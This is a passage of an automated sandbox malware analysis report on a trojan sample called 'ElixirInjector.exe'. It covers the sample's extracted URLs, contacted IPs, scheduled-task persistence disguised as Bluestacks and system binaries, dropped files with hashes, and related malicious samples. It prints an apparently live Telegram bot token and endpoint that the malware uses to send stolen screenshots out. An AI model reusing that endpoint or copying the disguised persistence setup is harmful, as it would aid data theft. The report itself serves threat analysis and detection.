http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001E.00000002.2711170889.000001AE88EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2702418086.000001E400807000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2730085660.00000222296CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2704914975.000001CB084A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2706132711.0000026B23128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2719372641.0000019538287000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2689589857.0000020480227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2762263901.0000022F3D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2708333629.000002C0936A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2712206652.000001E3AB348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2727104667.000001E1BF2D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2708913289.000002590F5F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2720674085.00000240066A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2764015001.000001EF3B613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2703673478.0000017B0D156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2686411931.000001D980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2687160428.0000028200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ipinfo.io	Bluestacks.exe, 00000005.00000002.2525083932.0000000002E47000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001E.00000002.2711170889.000001AE88EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2702418086.000001E400807000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2730085660.00000222296CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2704914975.000001CB084A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2706132711.0000026B23128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2719372641.0000019538287000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2689589857.0000020480227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2762263901.0000022F3D3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2708333629.000002C0936A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2712206652.000001E3AB348000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2727104667.000001E1BF2D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2708913289.000002590F5F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2720674085.00000240066A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2764015001.000001EF3B613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2703673478.0000017B0D156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2686411931.000001D980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2687160428.0000028200228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7622199935:AAFHSUQ61526mhYJcmipjqz2DM9Zso04aBI/sendPhotoX	Bluestacks.exe, 00000005.00000002.2525083932.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 0000001E.00000002.2711170889.000001AE88B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2702418086.000001E4005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2730085660.0000022229321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2704914975.000001CB08281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2706132711.0000026B22F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2719372641.0000019538061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2689589857.0000020480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2762263901.0000022F3D0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2708333629.000002C093481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2712206652.000001E3AB121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2727104667.000001E1BF0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2708913289.000002590F3E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2720674085.0000024006481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2764015001.000001EF3B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2703673478.0000017B0CF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2686411931.000001D980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2687160428.0000028200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2709061242.000001AD35D91000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	Bluestacks.exe, 00000005.00000002.2525083932.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Bluestacks.exe, 00000005.00000002.2525083932.000000000297E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2711170889.000001AE88B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2702418086.000001E4005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2730085660.0000022229321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2704914975.000001CB08281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2706132711.0000026B22F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2719372641.0000019538061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2689589857.0000020480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2762263901.0000022F3D0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2708333629.000002C093481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2712206652.000001E3AB121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2727104667.000001E1BF0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2708913289.000002590F3E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2720674085.0000024006481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2764015001.000001EF3B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2703673478.0000017B0CF31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2686411931.000001D980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2687160428.0000028200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2709061242.000001AD35D91000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	false	high
http://go.mic	Bluestacks.exe, 00000005.00000002.2476855882.000000000096B000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ipinfo.io	Bluestacks.exe, 00000005.00000002.2525083932.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2525083932.0000000002E2D000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
34.117.59.81	ipinfo.io	United States		139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590004
Start date and time:	2025-01-13 13:19:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	76
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	ElixirInjector.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@84/100@2/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Bluestacks.exe, PID 3576 because it is empty
Execution Graph export aborted for target fvXBwqYdGYPkplbuTcoXecCdP.exe, PID 8996 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:20:30	API Interceptor	38x Sleep call for process: Bluestacks.exe modified
07:20:39	API Interceptor	375x Sleep call for process: powershell.exe modified
13:20:29	Task Scheduler	Run new task: Bluestacks path: "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe"
13:20:31	Task Scheduler	Run new task: BluestacksB path: "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe"
13:20:31	Task Scheduler	Run new task: cmd path: "C:\Windows\ShellComponents\cmd.exe"
13:20:32	Task Scheduler	Run new task: cmdc path: "C:\Windows\ShellComponents\cmd.exe"
13:20:33	Task Scheduler	Run new task: fontdrvhost path: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe"
13:20:34	Task Scheduler	Run new task: fontdrvhostf path: "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe"
13:20:37	Task Scheduler	Run new task: fvXBwqYdGYPkplbuTcoXecCdP path: "C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe"
13:20:39	Task Scheduler	Run new task: fvXBwqYdGYPkplbuTcoXecCdPf path: "C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
34.117.59.81	0t8amSU3vd.exe	Get hash	malicious	CryptoWall, TrojanRansom	Browse	ipinfo.io/ip
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	ipinfo.io/json
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	http://cosmetological.xyz/xoqae/go?rgcid=&rx_p=&rgsubid=d-wboqentba-arg	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://clumsy-sulky-helium.glitch.me/	Get hash	malicious	Unknown	Browse	34.117.59.81
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	0t8amSU3vd.exe	Get hash	malicious	CryptoWall, TrojanRansom	Browse	34.117.59.81
	z.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	34.117.59.81
	h.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	34.117.59.81
	1.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	1.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	DownloadedMessage.zip	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
api.telegram.org	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	149.154.167.99
	http://www.eovph.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://www.eghwr.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://telegrams-mc.org/	Get hash	malicious	Unknown	Browse	149.154.170.96
	https://telegramerong.cc/app/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	http://cosmetological.xyz/xoqae/go?rgcid=&rx_p=&rgsubid=d-wboqentba-arg	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://clumsy-sulky-helium.glitch.me/	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://talktalk770.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	34.117.239.71
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	34.117.77.79
	https://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2	Get hash	malicious	Unknown	Browse	34.117.77.79
	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	34.117.112.1
	0t8amSU3vd.exe	Get hash	malicious	CryptoWall, TrojanRansom	Browse	34.117.59.81
	https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/	Get hash	malicious	Unknown	Browse	34.117.77.79

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	ReanProject.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 34.117.59.81
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220 34.117.59.81
	ReanProject.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	https://email.mg.decisiontime.online/c/eJxszjFvszAQgOFfYzbQ-c4mMHj4pK_M3TqDOZdTjR1hJyj_vkqVMeujd3hXZxnHi2_Y6Qv1hohgaHifJbbhyHu75n2W5M7z7Fb2UiSnKjt3OUVJ_CqjpJ9WVoeoxwEvL62PKz9VN5szGsd5AQoLgV-oZ2_1oPuFgrWAvWnEIaAFDaM2ZGHoAsy0DGwY2VpNoAzs328fottqvRZF_xROCqeyFV_flQonDLPC6c6HhEfr8_q0v9vmcB9xlsTdl8SS0__8qQyUfKsbH6ket1K7rfgkXeLa3B3-BgAA__-9dmXG	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 34.117.59.81
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220 34.117.59.81
	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 34.117.59.81
	invnoIL438805.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 34.117.59.81

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BlUGSVrR.log	OneDriveStandaloneUpdater.exe	Get hash	malicious	DCRat	Browse
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	qNdO4D18CF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	LzmJLVB41K.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	k1iZHyRK6K.exe	Get hash	malicious	DCRat	Browse
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	150484992
Entropy (8bit):	0.19755066131239787
Encrypted:	false
SSDEEP:	49152:jjCl2oCZas6DG1pHbi/cGHueSAZR8SH2asUTnr:jjPb3SIexlH2a
MD5:	E18151C31580AA91CEB01099DE4277B2
SHA1:	979C02265019C77ADA5578B1CFC1A98A65F5F095
SHA-256:	2A01AA8E358B9A949A198CA22EA8FA189990D3004467E600136142D7D97E3D08
SHA-512:	C7CEAE4B46C186C8F36ACA7B6334E116BD42E9A164CCF382F4F29298CAC4790BA1BEA7E90DDB738A6DE925890202BFE65D606A83C9C13665701CA9C712DC915A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 59%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.................$ ..........B .. ...` ...@.. ........................ ...........@..................................B .K....` . ..................... ...................................................... ............... ..H............text...." .. ...$ ................. ..`.rsrc... ....` ......& .............@....reloc........ ......* .............@..B.................B .....H.......T...................S...B ......................................0..........(.... ........8........E...............N...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ........8........0..Q....... ........8........E....)...........r.......M.......8$...8.... ....~....{}...:....& ....8....8.... ....~....{o...9....& ....8.......... ....~....{k...:x...& ....8m...~....(_... .... .... ....s....~....(c....... ....~....{p...:-...& ....8"...

C:\Program Files\7-Zip\ad448380f74670

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	ASCII text, with very long lines (597), with no line terminators
Category:	dropped
Size (bytes):	597
Entropy (8bit):	5.874307025143204
Encrypted:	false
SSDEEP:	12:ZH8Mz/0nSamsUAYtBZoNiCeX+r6KEflMhp4TphGDTvm5HIBQWfm:ZcXdUNt/8iRX+eKRgbIB1m
MD5:	3EDB09CC8FDA7077FE2E8CA07BC3FD2B
SHA1:	D9479C0AA8E109F1DD8A20E8561470CECC7F3C11
SHA-256:	A97A2ECCE3E96328F2D604A317C8BD8740212B34FB5921179DA3D748C000AD44
SHA-512:	CD7ECD2652B35F1D0589BCDC58DE58DDAEC3D2EDBEA23CDE84D9EF2C4DC95AFF569CA45A0E1AFA34F9A0824FD99F7A87B58CBDC47F5864C66FF87E7151A3D4E0
Malicious:	false
Preview:	KEWg3WB0i4q3wTgYPSG9NcxFz09eDb1GHCO10UEJWlPXV0xlyEfv8AXsQQqCXgxHDkvuFph4O6mmNau9DXp85GHGpfkjnBwzxHUuEDfJgkgCYvf0gr991yL6dpFjE8QMKxyFG95A1gcVkFs3AtC6Cw886XRZ76EhTT1k6auhv8HVWzWX6LjU6TKXyzIsrgC5b4BQNH7k9eLDonmHB3cwWtl9JdwHRC0P6L3cyFJzO9VbIGtLNBqxDPjrSBGtVzS7o5HctJS5tmiXYK1Cuk4QWCMqmLKw9ZdYrYxN9QbDsuEarMSIKE9v5Clmsbzh9g6TJKpAWnCeI0hl8v9a2Bm4asdpwKeia4EMxuRggSvgBemEe9o7bZo73B3arANMIeDOwVyNdc4kQF35GYKxghGBPGSv11zfEjYgbYSJKad9eEryI7US0aplYC9pCCWmmZgrrWerFBmFDGgLZdn3ggpo3wIYZnGID1WFhAHvcmNyxjiRgyPiZcFFt1x4OGSc5eCLtanZW2b4T01TN11lXhtlvRVpMMhWTu3ShWhFK0MgBLw3AeqWOrFYvaacF7NJUFkj7iv1TwahUMjkecpsfKHlp

C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	150484992
Entropy (8bit):	0.19755066131239787
Encrypted:	false
SSDEEP:	49152:jjCl2oCZas6DG1pHbi/cGHueSAZR8SH2asUTnr:jjPb3SIexlH2a
MD5:	E18151C31580AA91CEB01099DE4277B2
SHA1:	979C02265019C77ADA5578B1CFC1A98A65F5F095
SHA-256:	2A01AA8E358B9A949A198CA22EA8FA189990D3004467E600136142D7D97E3D08
SHA-512:	C7CEAE4B46C186C8F36ACA7B6334E116BD42E9A164CCF382F4F29298CAC4790BA1BEA7E90DDB738A6DE925890202BFE65D606A83C9C13665701CA9C712DC915A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 59%, Browse Antivirus: ReversingLabs, Detection: 58%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.................$ ..........B .. ...` ...@.. ........................ ...........@..................................B .K....` . ..................... ...................................................... ............... ..H............text...." .. ...$ ................. ..`.rsrc... ....` ......& .............@....reloc........ ......* .............@..B.................B .....H.......T...................S...B ......................................0..........(.... ........8........E...............N...8....(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....(.... ........8........0..Q....... ........8........E....)...........r.......M.......8$...8.... ....~....{}...:....& ....8....8.... ....~....{o...9....& ....8.......... ....~....{k...:x...& ....8m...~....(_... .... .... ....s....~....(c....... ....~....{p...:-...& ....8"...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Bluestacks.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cmd.exe.log

Download File

Process:	C:\Windows\ShellComponents\cmd.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
